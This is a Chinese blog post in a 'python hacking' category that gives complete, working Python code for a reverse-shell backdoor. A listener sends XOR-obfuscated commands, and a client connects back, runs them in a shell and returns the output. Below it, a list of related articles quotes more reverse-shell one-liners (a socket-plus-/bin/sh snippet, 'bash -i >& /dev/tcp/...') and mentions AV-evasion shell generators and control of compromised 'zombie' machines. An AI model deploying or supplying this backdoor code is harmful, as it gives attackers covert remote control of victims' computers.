python 反向shell 编程

最新推荐文章于 2024-02-08 22:44:52 发布
最新推荐文章于 2024-02-08 22:44:52 发布
阅读量534 收藏 4
点赞数
分类专栏: python-黑客编程 文章标签: python
本文介绍了一个使用Python实现的简单后门通信程序。该程序包括服务端和客户端两部分,服务端负责监听并发送指令,客户端接收指令并执行,之后将结果返回给服务端。程序通过套接字进行通信,并采用异或操作对数据进行简单的编码和解码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

服务端(监听端):
建立套接字编程
绑定端口
监听
连接到后门
发送信息(例如命令whoami之类的)
接收到后门返回的信息

后门(客服端):
建立套接字
连接服务器
接收服务器返回的信息
处理后返回给服务器

程序:
服务端(监听端):

#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #套接字
s.bind(("0.0.0.0",5555))                            #绑定在5555端口
s.listen(2048)                                       #监听
print "listening on port 443...."
(client,(ip,port)) = s.accept()                    #接收到返回
print "recived connection from :",ip
while True:
    command = raw_input('>')
    encode = bytearray(command)   
                      #bytearray([source [, encoding [, errors]]])返回一个byte数组。如果source为字符串,则按照指定的encoding将字符串转换为字节序列;
    for i in range(len(encode)):                     #遍历经过bytearray处理后的encode
        encode[i]^=0x41                              #对输入的信息进行编码 ^(异或)
    client.send(encode)                            #发送我们输入的信息(编码后的)到后门


    #以上是连接到后门shell后,用户输入信息,处理后发送给shell


    #下面等待shell返回的信息,在进行解码处理
    en_data = client.recv(2048)                  #接收到返回的信息
    decode = bytearray(en_data)
    for i in range(len(decode)):
        decode[i]^=0x41                             #解码
    print decode                                   #打印出来
client.close()
s.close()

bytearray参考
http://www.pythontab.com/html/2013/hanshu_0124/165.html

如果想要修改一个字节串中的某个字节,不能够直接修改,需要将其转化为bytearray后再进行修改
http://www.jb51.net/article/78831.htm

后门(客服端):

#!/usr/bin/python

import socket, subprocess, sys
RHOST = sys.argv[1]
RPORT = 5555
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST,RPORT))
while True:
    data = s.recv(1024)                                   #接收服务器传来的信息
    en_data = bytearray(data)                             # 把信息进行bytearray处理
    for i in range(len(en_data)):                           #遍历
        en_data[i]^=0x41                                     #解码(服务器发送过的是经过编码的)
    comn = subprocess.Popen(str(en_data),shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)  #shell=Ture 表示在shell环境解释
                                                                                                                                        #subprocess.Popen用来执行系统命令
    comn.wait()                                                   #stdin, stdout, stderr分别表示程序的标准输入、输出、错误句柄。
    STDOUT,STDERR = comn.communicate()                         #  comn.communicate()防止阻塞
    print STDERR
    en_STDOUT = bytearray(STDOUT)                            #对输出STDOUT进行处理
    for i in range(len(en_STDOUT)):
        en_STDOUT[i]^=0x41                                    #编码
    s.send(en_STDOUT)                                        #发送回服务器
s.close()

#接收到服务器发送过来的信息,解码后,调用子进程,标准输入输出(subprocess.Popen),执行服务器发送过来的信息,然后输出STDOUT,再编码,发送回去给服务器。

subprocess.Popen参考http://www.cnblogs.com/zhoug2020/p/5079407.html

Python3实现反向Shell
Pad0y的博客
09-28 2204
很多有名的远程控制工具都是基于C/S结构开发的,比如:灰鸽子、冰河、teamViewer等等。通常情况下是将Client作为控制端,Server作为被控端。这里笔者将采用反向连接的方式,将Server作为控制端,Client作为被控端。当然,这两种方式都可以实现功能。这里我采用反向连接的方式主要是考虑到肉鸡在内网中,我们是无法直接连接到被控端的。如果用反向连接的方式,尽管被控端在内网中,只要我们不在内网中,或者我们做了内网端口映射、动态域
Python3 实现可控制肉鸡的反向Shell
git1314的博客
09-29 931
Python3 实现可控制肉鸡的反向Shell 一、初识 1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为Client主动连接到我们的Server端,以实现对多个远程主机的管理! 学习技能: 了解TCP协议 了解C/S结构程序设计 Python socket模块的使用 Python subprocess模块的...
Python Security 之 反向Shell
不急不躁
07-14 1323
首先我们先演示使用Python如何利用web服务器的功能,把文件从另一台主机传送过来。 我们假设你有一台傀儡主机,你现在想下载傀儡机上面的的文件。那么你就可以使用shell(或meterpreter)去访问这台傀儡机,你可以通过一行Python代码把傀儡机建立成为一个web服务器,然后下载傀儡机上面的文件.创建一个python HTTP服务器可以直接使用python的内建函数”SimpleHTTP
Python实现反向Shell
xingxsc的博客
02-08 693
反向Shell的实现也是可以通过python来实现,接下来会用到socket, subprocess来写。
Python 反向 Shell 代码分析
weixin_46104215的博客
11-27 1221
import os,socket,subprocess; s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.110.130',2222)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) s = socket.socket(socket.AF_INET,.
HTTP-Reverse-Shell:Python中的HTTP反向Shell
05-22
这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 ...
Python反向Shell:利用DNS通道实现隐蔽通信
根据提供的文件信息,我们需要探讨的知识点包括Python反向Shell的概念、DNS协议在C2通信中的应用、dnslib库的介绍以及使用Python实现反向Shell编程实践。下面将详细展开这些知识点。 ### Python反向Shell概念 ...
利用python反向shell
最新发布
02-09
对不起,但是不能提供有关创建反向Shell的教程或示例。这类请求涉及到可能非法和不道德的行为,违反了网络安全法规和服务条款。 为了帮助学习合法且有益的内容,可以介绍一些Python在网络编程中的正当应用,比如...
Reverse-Shell-with-autorun:在python上实现的反向shell,包括服务器,客户端和自动运行代码。 从服务器在后台控制客户端PC命令行
04-13
**Python反向Shell详解** Python是一种功能强大的编程语言,它在网络安全领域中有着广泛的应用,尤其是在渗透测试和安全审计中。其中一个重要的应用就是构建反向Shell反向Shell允许攻击者通过网络远程控制目标...
MCreator:Python反向Shell生成器绕过AV技巧
资源摘要信息:"mcreator是一个用Python编写的反向Shell生成器,其具有绕过安全软件(如杀毒软件,AV)的技术。它可以帮助开发者快速创建反向Shell,这是一种常用的攻击技术,通过它可以远程控制受害者的计算机。其...
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
revshellgen:用Python 3编写的反向shell生成器
02-05
Revshellgen 用Python 3编写的独立脚本,无需键入即可轻松生成反向shell。 它可以自动完成一些无聊的工作,例如URL编码命令和设置侦听器。 下载 git clone https://github.com/t0thkr1s/revshellgen 安装 该脚本有4个依赖项: 您可以通过键入以下内容来安装它们: python3 setup.py install 跑 python3 revshellgen.py 屏幕截图 屏幕截图1 屏幕截图2 免责声明 该工具仅用于测试和学术目的,并且只能在经过严格同意的情况下使用。 请勿将其用于非法目的! 最终用户有责任遵守所有适用的地
反向shell
weixin_34162228的博客
06-12 573
为什么80%的码农都做不了架构师?>>> ...
基于DNS的反向Shell
手牵手科技
04-19 553
Chashell是一个由Go编写的基于DNS进行通信的反向shell。它可用于绕过防火墙或严格限制的网络。 它带有一个名为chaserv的多客户端控制服务器。 chashell 通信安全 每个数据包都使用对称加密(XSalsa20 + Poly1305)进行加密,客户端和服务器之间使用共享密钥。 我们计划在未来实现非对称加密。 协议 Chashell使用Protocol Buffers序列化消息进...
Python-基于socket实现的反向shell攻击后门
Vimor的博客
09-09 5101
下面给出一个基于socket实现的反向shell攻击,或者叫做控制工具吧,简单点说来就是在“受害者”电脑上留一个后门,“攻击者”可以通过这个连接这个socket实现在“受害者”电脑上执行各种指令,再直白一点就是一个socket通信的实例而已。 “受害者“端(后门):backdoor.py,这里充当一个socket服务端程序,主要实现连接的的监听、数据的收发和处理以及指令的执行 #!/u
python反弹shell(linux)
秋水的博客
10-02 3237
第一种代码如下 标准输入 (stdin) :代码为 0 ,使用 < 或 << 标准输出 (stdout):代码为 1 ,使用 > 或 >> 标准错误输出(stderr):代码为 2 ,使用 2> 或 2>> import socket,subprocess,os s=socket.socket(socket.AF_...
反向Shell
钱国正的专栏
12-24 2786
http://os.51cto.com/art/201312/424378.htm 反向shell(Reverse shell)是一种往远程机器发送shell命令的技术,当远程机器处在防火墙等其它东西后面时,这种技术会变得非常有用。你也许会说,“一个普通的shell或简单的SSH通道不是也能实现这些吗?”不,无法实现。在网上,我看到很多人对普通shell反向shell之间的区别分不清。在我
反向 shell
lyyslsw的专栏
12-27 721
nc -p 4444 -lvv 监听在4444端口, 监听模式, 显示命令执行过程, 假设本机IP地址10.100.125.15 bash -i >& /dev/tcp/10.100.125.15/44440>&1, 假设本机IP地址为10.100.125.14 bash -i : bash的交互模式 当>&后面接文件时,表示将标准输...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值